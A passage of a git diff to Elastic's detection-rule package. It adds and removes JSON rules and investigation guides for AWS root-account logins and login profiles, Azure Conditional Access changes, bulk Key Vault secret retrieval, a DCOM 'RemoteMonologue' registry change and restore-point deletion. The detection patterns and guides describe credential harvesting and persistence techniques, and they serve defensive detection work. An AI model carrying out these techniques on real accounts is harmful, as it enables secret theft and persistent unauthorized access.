Follow security best practices [outlined](https://aws.amazon.com/premiumsupport/knowledge-center/security-best-practices/) by AWS.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", + "query": "event.dataset:aws.cloudtrail and event.provider:signin.amazonaws.com and event.action:ConsoleLogin and\n aws.cloudtrail.user_identity.type:Root and\n aws.cloudtrail.console_login.additional_eventdata.mfa_used:false and\n event.outcome:success\n", + "references": [ + "https://docs.aws.amazon.com/IAM/latest/UserGuide/id_root-user.html" + ], + "related_integrations": [ + { + "integration": "cloudtrail", + "package": "aws", + "version": "^4.0.0" + } + ], + "required_fields": [ + { + "ecs": false, + "name": "aws.cloudtrail.console_login.additional_eventdata.mfa_used", + "type": "boolean" + }, + { + "ecs": false, + "name": "aws.cloudtrail.user_identity.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "bc0c6f0d-dab0-47a3-b135-0925f0a333bc", + "setup": "The AWS Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "severity": "high", + "tags": [ + "Domain: Cloud", + "Data Source: AWS", + "Data Source: Amazon Web Services", + "Data Source: AWS Route53", + "Use Case: Identity and Access Audit", + "Resources: Investigation Guide", + "Tactic: Privilege Escalation" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1078", + "name": "Valid Accounts", + "reference": "https://attack.mitre.org/techniques/T1078/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 212 + }, + "id": "bc0c6f0d-dab0-47a3-b135-0925f0a333bc_212", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/bc48bba7-4a23-4232-b551-eca3ca1e3f20_103.json b/packages/security_detection_engine/kibana/security_rule/bc48bba7-4a23-4232-b551-eca3ca1e3f20_103.json deleted file mode 100644 index 87771edbf8f..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/bc48bba7-4a23-4232-b551-eca3ca1e3f20_103.json +++ /dev/null @@ -1,82 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "Identifies when an Azure Conditional Access policy is modified. Azure Conditional Access policies control access to resources via if-then statements. For example, if a user wants to access a resource, then they must complete an action such as using multi-factor authentication to access it. An adversary may modify a Conditional Access policy in order to weaken their target's security controls.", - "from": "now-25m", - "index": [ - "filebeat-*", - "logs-azure*" - ], - "language": "kuery", - "license": "Elastic License v2", - "name": "Azure Conditional Access Policy Modified", - "note": "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating Azure Conditional Access Policy Modified\n\nAzure Conditional Access policies are critical for managing secure access to resources by enforcing specific conditions, such as requiring multi-factor authentication. Adversaries may exploit this by altering policies to weaken security, potentially bypassing authentication measures. The detection rule monitors logs for successful modifications to these policies, flagging potential unauthorized changes that could indicate malicious activity.\n\n### Possible investigation steps\n\n- Review the Azure activity and audit logs to identify the specific user account associated with the \"Update conditional access policy\" action and verify if the modification was authorized.\n- Examine the details of the modified Conditional Access policy to understand the changes made, focusing on any alterations that could weaken security, such as the removal of multi-factor authentication requirements.\n- Check the event.outcome field to confirm the success of the policy modification and correlate it with any recent access attempts or suspicious activities involving the affected resources.\n- Investigate the history of changes to the Conditional Access policies to identify any patterns or repeated unauthorized modifications that could indicate persistent malicious activity.\n- Assess the user's role and permissions to determine if they have legitimate access to modify Conditional Access policies, and review any recent changes to their account or role assignments.\n\n### False positive analysis\n\n- Routine administrative updates to Conditional Access policies by authorized IT personnel can trigger alerts. To manage this, maintain a list of authorized users and their expected activities, and create exceptions for these users in the monitoring system.\n- Scheduled policy reviews and updates as part of regular security audits may also result in false positives. Document these activities and schedule them during known maintenance windows to differentiate them from unauthorized changes.\n- Automated scripts or tools used for policy management might generate alerts if they modify policies. Ensure these tools are properly documented and their actions are logged separately to distinguish them from potential threats.\n- Changes made during the onboarding or offboarding of employees can appear as suspicious activity. Implement a process to log these events separately and cross-reference them with HR records to verify legitimacy.\n- Integration with third-party security solutions that modify policies for compliance or optimization purposes can lead to false positives. Establish a clear change management process and whitelist these integrations to prevent unnecessary alerts.\n\n### Response and remediation\n\n- Immediately review the modified Conditional Access policy to understand the changes made and assess the potential impact on security controls.\n- Revert any unauthorized or suspicious changes to the Conditional Access policy to restore the original security posture.\n- Conduct a thorough investigation to identify the source of the modification, including reviewing audit logs for unusual activity or unauthorized access attempts.\n- Temporarily increase monitoring and logging of Conditional Access policy changes to detect any further unauthorized modifications.\n- Notify the security team and relevant stakeholders about the incident and the steps taken to mitigate the risk.\n- If malicious activity is confirmed, initiate an incident response process, including isolating affected accounts and conducting a full security assessment.\n- Implement additional security measures, such as stricter access controls or enhanced multi-factor authentication requirements, to prevent similar incidents in the future.", - "query": "event.dataset:(azure.activitylogs or azure.auditlogs) and\nevent.action:\"Update conditional access policy\" and event.outcome:(Success or success)\n", - "references": [ - "https://docs.microsoft.com/en-us/azure/active-directory/conditional-access/overview" - ], - "related_integrations": [ - { - "integration": "activitylogs", - "package": "azure", - "version": "^1.0.0" - }, - { - "package": "azure", - "version": "^1.0.0" - } - ], - "required_fields": [ - { - "ecs": true, - "name": "event.action", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.dataset", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.outcome", - "type": "keyword" - } - ], - "risk_score": 47, - "rule_id": "bc48bba7-4a23-4232-b551-eca3ca1e3f20", - "setup": "The Azure Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", - "severity": "medium", - "tags": [ - "Domain: Cloud", - "Data Source: Azure", - "Use Case: Configuration Audit", - "Tactic: Persistence", - "Resources: Investigation Guide" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0003", - "name": "Persistence", - "reference": "https://attack.mitre.org/tactics/TA0003/" - }, - "technique": [ - { - "id": "T1098", - "name": "Account Manipulation", - "reference": "https://attack.mitre.org/techniques/T1098/" - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "query", - "version": 103 - }, - "id": "bc48bba7-4a23-4232-b551-eca3ca1e3f20_103", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/c04be7e0-b0fc-11ef-a826-f661ea17fbce_4.json b/packages/security_detection_engine/kibana/security_rule/c04be7e0-b0fc-11ef-a826-f661ea17fbce_4.json new file mode 100644 index 00000000000..540d3a8a980 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/c04be7e0-b0fc-11ef-a826-f661ea17fbce_4.json @@ -0,0 +1,119 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies creation of a console login profile for the AWS account root user. While CreateLoginProfile normally applies to IAM users, when performed from a temporary root session (e.g., via AssumeRoot) and the userName parameter is omitted, the profile is created for the root principal (self-assigned). Adversaries with temporary root access may add or reset the root login profile to establish persistent console access even if original access keys are rotated or disabled. Correlate with recent AssumeRoot/STS activity and validate intent with the account owner.", + "from": "now-6m", + "index": [ + "filebeat-*", + "logs-aws.cloudtrail-*" + ], + "investigation_fields": { + "field_names": [ + "@timestamp", + "user_agent.original", + "source.ip", + "aws.cloudtrail.user_identity.arn", + "aws.cloudtrail.user_identity.type", + "aws.cloudtrail.user_identity.access_key_id", + "event.action", + "event.outcome", + "cloud.account.id", + "cloud.region", + "aws.cloudtrail.request_parameters", + "aws.cloudtrail.response_elements" + ] + }, + "language": "eql", + "license": "Elastic License v2", + "name": "AWS IAM Login Profile Added for Root", + "note": "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\nThis rule detects when a console login profile is created for the AWS root account. \nA login profile enables password-based console access, and because the root user has unrestricted privileges, creating one is an extremely high-impact event. Adversaries who temporarily gain root-level credentials (for example, through an STS session or credential compromise) may use `CreateLoginProfile` without specifying a `userName` to add a password to the root account. This grants persistent access even if the attacker\u2019s API keys are later rotated or disabled.\n\n### Possible investigation steps\n\n**Assess the timing and context of the event**\n- Review the `@timestamp` to determine when the `CreateLoginProfile` call occurred. \n - Correlate this time window with other root or IAM activity such as `AssumeRoot`, `GetSessionToken`, `ConsoleLogin`, or `CreateAccessKey`. \n - Check for follow-on activity, especially `ConsoleLogin` events or `UpdateLoginProfile`, which may indicate that the root password was used immediately after creation.\n\n**Investigate event origin and session details**\n- Review `source.ip` and `user_agent.original`:\n - Determine if the request originated from an expected network range, VPN endpoint, or geolocation.\n - Identify whether the access was interactive (for example, browser or AWS console) or automated (`aws-cli`, SDK, or API client).\n- Examine `aws.cloudtrail.user_identity.access_key_id` and associated STS session context to see if temporary credentials were used.\n- Compare this event\u2019s IP and access key to any other recent CloudTrail activity to identify potential lateral movement or multi-account access attempts.\n\n**Analyze the login profile creation**\n- Review `aws.cloudtrail.request_parameters` and `aws.cloudtrail.response_elements`:\n - Check whether `passwordResetRequired` was set to `true` or omitted, absence may imply that the attacker created a password they intend to reuse.\n- Cross-reference this action with previous failed login attempts, password recovery requests, or `AssumeRoot` behavior.\n\n**Correlate related identity and access behavior**\n- Search for additional IAM management activity:\n - `AttachUserPolicy`, `AttachRolePolicy`, or `PutUserPolicy` granting elevated permissions.\n - New `AccessKey` creation or `UpdateAccessKey` events tied to the same session.\n- Review GuardDuty findings or any other detections referencing this account or IP around the same time period.\n- If available, correlate with CloudTrail to detect if other resource creation or configuration changes followed the login profile addition.\n\n**Validate with account owner or authorized personnel**\n- Contact the designated account or root credential owner to confirm whether this action was intentional (for example, during an account recovery).\n- Review any internal change-management or service ticketing systems for an approved request matching this activity.\n\n### False positive analysis\n\nAlthough rare, legitimate scenarios include:\n- **Authorized account recovery** : An administrator or AWS Support might temporarily add a root login profile to regain access. Validate against documented recovery workflows. \n- **Controlled testing or sandbox environments** : Certain sandbox accounts may reuse root credentials for automation or demonstration purposes. Tag and exclude these accounts from this rule where appropriate. \n- **Automated provisioning** : Review any account bootstrap or recovery automation scripts that may invoke `CreateLoginProfile` on root credentials.\n\nFor any potential false positive, verify that:\n- The `source.ip` and `user_agent.original` values align with expected administrative locations and tools. \n- The change was recorded during a maintenance window or known security operation.\n\n### Response and remediation\n\n> Any unapproved creation of a login profile for the root account is a critical security incident requiring immediate containment and credential rotation.\n\n**1. Containment**\n- Delete the newly created root login profile if it was not authorized. \n- Rotate the root account password using AWS\u2019s official password-reset workflow. \n- Revoke any active sessions, temporary credentials, or tokens associated with this event. \n- Verify that multi-factor authentication (MFA) is enabled and functioning on the root account. \n- Check that no root access keys exist \u2014 if present, remove them immediately.\n\n**2. Investigation and scoping**\n- Examine CloudTrail logs from 30 minutes before and after this event to identify correlated actions. \n- Capture and securely store these logs in an isolated S3 bucket with Object Lock enabled to preserve forensic integrity. \n- Investigate for additional IAM or STS operations by the same `access_key_id` or IP address that may indicate privilege escalation or persistence attempts. \n- Review whether any new IAM roles, users, or policies were created in proximity to this event.\n\n**3. Recovery and hardening**\n- Reset the root password and distribute the new credentials securely to authorized custodians only. \n- Ensure MFA is enforced for all administrative and root-level access. \n- Audit all IAM policies for least-privilege adherence, focusing on `iam:CreateLoginProfile`, `iam:UpdateLoginProfile`, and `iam:CreateAccessKey` permissions. \n- Enable Cloudtrail, GuardDuty, AWS Config, and Security Hub across all regions for continuous monitoring of root and IAM activity. \n- Review your organization\u2019s playbooks and detection coverage for root-level persistence techniques, and update procedures as needed.\n\n**4. Post-incident actions**\n- Notify AWS account owners and your security operations center of the incident. \n- Conduct a post-mortem to determine the initial vector of compromise (e.g., stolen credentials, misconfigured role chaining, or insufficient MFA). \n- Update alerting thresholds and detection logic to minimize mean time to detect (MTTD) and respond (MTTR).\n\n### Additional information\n\n- **AWS Incident Response Playbooks** \n - [IRP-CredCompromise](https://github.com/aws-samples/aws-incident-response-playbooks/blob/c151b0dc091755fffd4d662a8f29e2f6794da52c/playbooks/IRP-CredCompromise.md) \u2013 Containment and recovery for suspected credential abuse. \n- **AWS Customer Playbook Framework** \n - [Compromised_IAM_Credentials.md](https://github.com/aws-samples/aws-customer-playbook-framework/blob/a8c7b313636b406a375952ac00b2d68e89a991f2/docs/Compromised_IAM_Credentials.md) \u2013 Steps to contain, investigate, and recover from credential compromise. \n- **AWS Documentation** \n - [CreateLoginProfile API Reference](https://docs.aws.amazon.com/IAM/latest/APIReference/API_CreateLoginProfile.html) \n - [Root User Best Practices](https://docs.aws.amazon.com/IAM/latest/UserGuide/root-user-best-practices.html)\n", + "query": "any where event.dataset == \"aws.cloudtrail\"\n and event.provider == \"iam.amazonaws.com\"\n and event.action == \"CreateLoginProfile\"\n and aws.cloudtrail.user_identity.type == \"Root\"\n and event.outcome == \"success\"\n and not stringContains(aws.cloudtrail.request_parameters, \"userName=\")\n", + "related_integrations": [ + { + "integration": "cloudtrail", + "package": "aws", + "version": "^4.0.0" + } + ], + "required_fields": [ + { + "ecs": false, + "name": "aws.cloudtrail.request_parameters", + "type": "keyword" + }, + { + "ecs": false, + "name": "aws.cloudtrail.user_identity.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "c04be7e0-b0fc-11ef-a826-f661ea17fbce", + "severity": "high", + "tags": [ + "Domain: Cloud", + "Data Source: AWS", + "Data Source: Amazon Web Services", + "Data Source: AWS IAM", + "Use Case: Identity and Access Audit", + "Tactic: Persistence", + "Resources: Investigation Guide" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1078", + "name": "Valid Accounts", + "reference": "https://attack.mitre.org/techniques/T1078/", + "subtechnique": [ + { + "id": "T1078.004", + "name": "Cloud Accounts", + "reference": "https://attack.mitre.org/techniques/T1078/004/" + } + ] + }, + { + "id": "T1098", + "name": "Account Manipulation", + "reference": "https://attack.mitre.org/techniques/T1098/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 4 + }, + "id": "c04be7e0-b0fc-11ef-a826-f661ea17fbce_4", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/c07f7898-5dc3-11f0-9f27-f661ea17fbcd_4.json b/packages/security_detection_engine/kibana/security_rule/c07f7898-5dc3-11f0-9f27-f661ea17fbcd_4.json new file mode 100644 index 00000000000..f2ef51b67f6 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/c07f7898-5dc3-11f0-9f27-f661ea17fbcd_4.json @@ -0,0 +1,75 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies excessive secret or key retrieval operations from Azure Key Vault. This rule detects when a user principal retrieves secrets or keys from Azure Key Vault multiple times within a short time frame, which may indicate potential abuse or unauthorized access attempts. The rule focuses on high-frequency retrieval operations that deviate from normal user behavior, suggesting possible credential harvesting or misuse of sensitive information.", + "false_positives": [ + "Service accounts or applications that frequently access Azure Key Vault for configuration or operational purposes may trigger this rule.", + "Automated scripts or processes that retrieve secrets or keys for legitimate purposes, such as secret rotation or application configuration, may also lead to false positives.", + "Security teams performing routine audits or assessments that involve retrieving keys or secrets from Key Vaults may trigger this rule if they perform multiple retrievals in a short time frame." + ], + "from": "now-9m", + "interval": "8m", + "language": "esql", + "license": "Elastic License v2", + "name": "Excessive Secret or Key Retrieval from Azure Key Vault", + "note": "## Triage and analysis\n\n### Investigating Excessive Secret or Key Retrieval from Azure Key Vault\n\nAzure Key Vault is a cloud service that safeguards encryption keys and secrets like certificates, connection strings, and passwords. It is crucial for managing sensitive data in Azure environments. Unauthorized modifications to Key Vaults can lead to data breaches or service disruptions. This rule detects excessive secret or key retrieval operations from Azure Key Vault, which may indicate potential abuse or unauthorized access attempts.\n\n### Possible investigation steps\n- Review the `azure.platformlogs.identity.claim.upn` field to identify the user principal making the retrieval requests. This can help determine if the activity is legitimate or suspicious.\n- Check the `azure.platformlogs.identity.claim.appid` or `azure.platformlogs.identity.claim.appid_display_name` to identify the application or service making the requests. If the application is not recognized or authorized, it may indicate a potential security incident. It is plausible that the application is a FOCI compliant application, which are commonly abused by adversaries to evade security controls or conditional access policies.\n- Analyze the `azure.platformlogs.resource.name` field to determine which Key Vault is being accessed. This can help assess the impact of the retrieval operations and whether they target sensitive resources.\n- Review the `event.action` field to confirm the specific actions being performed, such as `KeyGet`, `SecretGet`, or `CertificateGet`. These actions indicate retrieval of keys, secrets, or certificates from the Key Vault.\n- Check the `source.ip` or `source.geo.*` fields to identify the source of the retrieval requests. Look for unusual or unexpected IP addresses, especially those associated with known malicious activity or geographic locations that do not align with the user's typical behavior.\n- Use the `time_window` field to analyze the frequency of retrieval operations. If multiple retrievals occur within a short time frame (e.g., within a few minutes), it may indicate excessive or suspicious activity.\n- Correlate the retrieval operations with other security events or alerts in the environment to identify any patterns or related incidents.\n- Triage the user with Entra ID sign-in logs to gather more context about their authentication behavior and any potential anomalies.\n\n### False positive analysis\n- Routine administrative tasks or automated scripts may trigger excessive retrievals, especially in environments where Key Vaults are heavily utilized for application configurations or secrets management. If this is expected behavior, consider adjusting the rule or adding exceptions for specific applications or user principals.\n- Legitimate applications or services may perform frequent retrievals of keys or secrets for operational purposes, such as configuration updates or secret rotation. If this is expected behavior, consider adjusting the rule or adding exceptions for specific applications or user principals.\n- Security teams may perform periodic audits or assessments that involve retrieving keys or secrets from Key Vaults. If this is expected behavior, consider adjusting the rule or adding exceptions for specific user principals or applications.\n- Some applications may require frequent access to keys or secrets for normal operation, leading to high retrieval counts. If this is expected behavior, consider adjusting the rule or adding exceptions for specific applications or user principals.\n\n### Response and remediation\n- Investigate the user principal making the excessive retrieval requests to determine if they are authorized to access the Key Vault and its contents. If the user is not authorized, take appropriate actions to block their access and prevent further unauthorized retrievals.\n- Review the application or service making the requests to ensure it is legitimate and authorized to access the Key Vault. If the application is unauthorized or suspicious, consider blocking it and revoking its permissions to access the Key Vault.\n- Assess the impact of the excessive retrieval operations on the Key Vault and its contents. Determine if any sensitive data was accessed or compromised during the retrievals.\n- Implement additional monitoring and alerting for the Key Vault to detect any further suspicious activity or unauthorized access attempts.\n- Consider implementing stricter access controls or policies for Key Vaults to limit excessive retrievals and ensure that only authorized users and applications can access sensitive keys and secrets.\n- Educate users and administrators about the risks associated with excessive retrievals from Key Vaults and encourage them to follow best practices for managing keys and secrets in Azure environments.\n", + "query": "from logs-azure.platformlogs-* metadata _id, _index\n\n// Filter for Azure Key Vault read operations\n| where event.dataset == \"azure.platformlogs\"\n and event.action in (\n \"VaultGet\",\n \"KeyGet\",\n \"KeyList\",\n \"KeyListVersions\",\n \"KeyGetDeleted\",\n \"KeyListDeleted\",\n \"SecretGet\",\n \"SecretList\",\n \"SecretListVersions\",\n \"SecretGetDeleted\",\n \"SecretListDeleted\",\n \"CertificateGet\",\n \"CertificateList\",\n \"CertificateListVersions\",\n \"CertificateGetDeleted\",\n \"CertificateListDeleted\",\n \"CertificatePolicyGet\",\n \"CertificateContactsGet\",\n \"CertificateIssuerGet\",\n \"CertificateIssuersList\"\n )\n\n// Truncate timestamps into 1-minute windows\n| eval Esql.time_window_date_trunc = date_trunc(1 minute, @timestamp)\n\n// Aggregate identity, geo, resource, and activity info\n| stats\n Esql_priv.azure_platformlogs_identity_claim_upn_values = values(azure.platformlogs.identity.claim.upn),\n Esql.azure_platformlogs_identity_claim_upn_count_distinct = count_distinct(azure.platformlogs.identity.claim.upn),\n Esql.azure_platformlogs_identity_claim_appid_values = values(azure.platformlogs.identity.claim.appid),\n\n Esql.source_ip_values = values(source.ip),\n Esql.source_geo_city_values = values(source.geo.city_name),\n Esql.source_geo_region_values = values(source.geo.region_name),\n Esql.source_geo_country_values = values(source.geo.country_name),\n Esql.source_as_organization_name_values = values(source.as.organization.name),\n\n Esql.event_action_values = values(event.action),\n Esql.event_count = count(*),\n Esql.event_action_count_distinct = count_distinct(event.action),\n Esql.azure_resource_name_count_distinct = count_distinct(azure.resource.name),\n Esql.azure_resource_name_values = values(azure.resource.name),\n Esql.azure_platformlogs_result_type_values = values(azure.platformlogs.result_type),\n Esql.cloud_region_values = values(cloud.region),\n\n Esql.agent_name_values = values(agent.name),\n Esql.azure_subscription_id_values = values(azure.subscription_id),\n Esql.azure_resource_group_values = values(azure.resource.group),\n Esql.azure_resource_id_values = values(azure.resource.id)\n\nby Esql.time_window_date_trunc, azure.platformlogs.identity.claim.upn\n\n// keep relevant fields\n| keep\n Esql.time_window_date_trunc,\n Esql_priv.azure_platformlogs_identity_claim_upn_values,\n Esql.azure_platformlogs_identity_claim_upn_count_distinct,\n Esql.azure_platformlogs_identity_claim_appid_values,\n Esql.source_ip_values,\n Esql.source_geo_city_values,\n Esql.source_geo_region_values,\n Esql.source_geo_country_values,\n Esql.source_as_organization_name_values,\n Esql.event_action_values,\n Esql.event_count,\n Esql.event_action_count_distinct,\n Esql.azure_resource_name_count_distinct,\n Esql.azure_resource_name_values,\n Esql.azure_platformlogs_result_type_values,\n Esql.cloud_region_values,\n Esql.agent_name_values,\n Esql.azure_subscription_id_values,\n Esql.azure_resource_group_values,\n Esql.azure_resource_id_values\n\n// Filter for suspiciously high volume of distinct Key Vault reads by a single actor\n| where Esql.azure_platformlogs_identity_claim_upn_count_distinct == 1 and Esql.event_count >= 10 and Esql.event_action_count_distinct >= 2\n\n| sort Esql.time_window_date_trunc desc\n", + "references": [ + "https://www.inversecos.com/2022/05/detection-and-compromise-azure-key.html" + ], + "related_integrations": [ + { + "integration": "platformlogs", + "package": "azure", + "version": "^1.0.0" + } + ], + "risk_score": 43, + "rule_id": "c07f7898-5dc3-11f0-9f27-f661ea17fbcd", + "setup": "#### Required Azure Key Vault Diagnostic Logs\n\nTo ensure this rule functions correctly, the following diagnostic logs must be enabled for Azure Key Vault:\n- AuditEvent: This log captures all read and write operations performed on the Key Vault, including secret, key, and certificate retrievals. These logs should be streamed to the Event Hub used for the Azure integration configuration.\n", + "severity": "medium", + "tags": [ + "Domain: Cloud", + "Domain: Storage", + "Domain: Identity", + "Data Source: Azure", + "Data Source: Azure Platform Logs", + "Data Source: Azure Key Vault", + "Use Case: Threat Detection", + "Use Case: Identity and Access Audit", + "Tactic: Credential Access", + "Resources: Investigation Guide" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1555", + "name": "Credentials from Password Stores", + "reference": "https://attack.mitre.org/techniques/T1555/", + "subtechnique": [ + { + "id": "T1555.006", + "name": "Cloud Secrets Management Stores", + "reference": "https://attack.mitre.org/techniques/T1555/006/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "esql", + "version": 4 + }, + "id": "c07f7898-5dc3-11f0-9f27-f661ea17fbcd_4", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/c18975f5-676c-4091-b626-81e8938aa2ee_1.json b/packages/security_detection_engine/kibana/security_rule/c18975f5-676c-4091-b626-81e8938aa2ee_1.json deleted file mode 100644 index eedc838364f..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/c18975f5-676c-4091-b626-81e8938aa2ee_1.json +++ /dev/null @@ -1,107 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "Identifies attempt to perform session hijack via COM object registry modification by setting the RunAs value to Interactive User.", - "from": "now-9m", - "index": [ - "logs-endpoint.events.registry-*", - "endgame-*", - "logs-m365_defender.event-*", - "logs-sentinel_one_cloud_funnel.*", - "logs-windows.sysmon_operational-*" - ], - "language": "eql", - "license": "Elastic License v2", - "name": "Potential RemoteMonologue Attack", - "note": "## Triage and analysis\n\n### Investigating Potential RemoteMonologue Attack\n\n\n### Possible investigation steps\n\n- Review the registry event logs to confirm the modification of the RunAs value in the specified registry paths, ensuring the change was not part of a legitimate administrative action.\n- Identify the user account and process responsible for the registry modification by examining the event logs for associated user and process information.\n- Check for any recent remote authentication attempts or sessions on the affected host to determine if this activity is associated with lateral movement or not.\n- Investigate the timeline of the registry change to correlate with any other suspicious activities or alerts on the host, such as the execution of unusual processes or network connections.\n\n\n### False positive analysis\n\n- Software updates or installations that modify COM settings.\n- Automated scripts or management tools that adjust COM configurations.\n### Response and remediation\n\n- Immediately isolate the affected system from the network to prevent further unauthorized access or lateral movement by the adversary.\n- Modify the registry value back to its secure state, ensuring that \"RunAs\" value is not set to \"Interactive User\".\n- Conduct a thorough review of recent user activity and system logs to identify any unauthorized access or changes made during the period NLA was disabled.\n- Reset passwords for all accounts that have accessed the affected system to mitigate potential credential compromise.\n- Escalate the incident to the security operations center (SOC) or incident response team for further investigation and to determine if additional systems are affected.\n- Implement enhanced monitoring on the affected system and similar endpoints to detect any further attempts to disable NLA or other suspicious activities.\n", - "query": "registry where host.os.type == \"windows\" and event.action != \"deletion\" and registry.value == \"RunAs\" and registry.data.strings : \"Interactive User\"\n", - "references": [ - "https://www.ibm.com/think/x-force/remotemonologue-weaponizing-dcom-ntlm-authentication-coercions#1", - "https://github.com/xforcered/RemoteMonologue" - ], - "related_integrations": [ - { - "package": "endpoint", - "version": "^9.0.0" - }, - { - "package": "m365_defender", - "version": "^2.22.0" - }, - { - "package": "sentinel_one_cloud_funnel", - "version": "^1.9.0" - }, - { - "package": "windows", - "version": "^2.5.0" - } - ], - "required_fields": [ - { - "ecs": true, - "name": "event.action", - "type": "keyword" - }, - { - "ecs": true, - "name": "host.os.type", - "type": "keyword" - }, - { - "ecs": true, - "name": "registry.data.strings", - "type": "wildcard" - }, - { - "ecs": true, - "name": "registry.value", - "type": "keyword" - } - ], - "risk_score": 73, - "rule_id": "c18975f5-676c-4091-b626-81e8938aa2ee", - "severity": "high", - "tags": [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Defense Evasion", - "Data Source: Elastic Defend", - "Data Source: Elastic Endgame", - "Data Source: Microsoft Defender for Endpoint", - "Data Source: SentinelOne", - "Data Source: Sysmon", - "Resources: Investigation Guide" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0005", - "name": "Defense Evasion", - "reference": "https://attack.mitre.org/tactics/TA0005/" - }, - "technique": [ - { - "id": "T1112", - "name": "Modify Registry", - "reference": "https://attack.mitre.org/techniques/T1112/" - }, - { - "id": "T1562", - "name": "Impair Defenses", - "reference": "https://attack.mitre.org/techniques/T1562/" - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "eql", - "version": 1 - }, - "id": "c18975f5-676c-4091-b626-81e8938aa2ee_1", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/c1a3e2f0-8a1b-11ef-9b4a-f661ea17fbce_1.json b/packages/security_detection_engine/kibana/security_rule/c1a3e2f0-8a1b-11ef-9b4a-f661ea17fbce_1.json new file mode 100644 index 00000000000..860d9fb1fa3 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/c1a3e2f0-8a1b-11ef-9b4a-f661ea17fbce_1.json @@ -0,0 +1,87 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the deletion of Azure Restore Point Collections by a user who has not previously performed this activity. Restore Point Collections contain recovery points for virtual machines, enabling point-in-time recovery capabilities. Adversaries may delete these collections to prevent recovery during ransomware attacks or to cover their tracks during malicious operations.", + "false_positives": [ + "Restore Point Collection deletions may be performed by system administrators during routine cleanup or decommissioning activities. Verify whether the user and resource should be performing these operations. Deletions from unfamiliar users or targeting critical resources should be investigated. If known behavior is causing false positives, it can be exempted from the rule." + ], + "from": "now-9m", + "history_window_start": "now-7d", + "index": [ + "logs-azure.activitylogs-*", + "filebeat-*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Azure Compute Restore Point Collection Deleted by Unusual User", + "new_terms_fields": [ + "azure.activitylogs.identity.claims_initiated_by_user.name", + "azure.resource.group" + ], + "note": "## Triage and analysis\n\n### Investigating Azure Compute Restore Point Collection Deleted by Unusual User\n\nAzure Compute Restore Point Collections are critical components for disaster recovery, containing snapshots that enable point-in-time\nrecovery of virtual machines. Deletion of these collections can severely impact an organization's ability to recover from\nincidents, making them attractive targets for adversaries conducting ransomware attacks or attempting to cover their tracks.\n\nThis rule detects when a user who has not previously deleted Restore Point Collections performs this operation, which may\nindicate unauthorized activity or a compromised account.\n\n### Possible investigation steps\n\n- Review the `azure.activitylogs.identity.claims_initiated_by_user.name` field to identify the specific user who performed the deletion operation.\n- Investigate the `azure.resource.id` or `azure.resource.name` fields to identify which Restore Point Collection was deleted and assess its criticality to business operations.\n- Review the timeline of the deletion event and correlate it with other security events or user activities to identify any suspicious patterns or related activities.\n- Verify whether the user account has legitimate access to perform this operation and whether this deletion was authorized through change management processes.\n- Check for any other unusual activities by the same user account around the time of the deletion, such as privilege escalation attempts or access to other sensitive resources.\n- Investigate whether there are any active alerts or indicators of compromise related to ransomware activity in the environment.\n\n### False positive analysis\n\n- 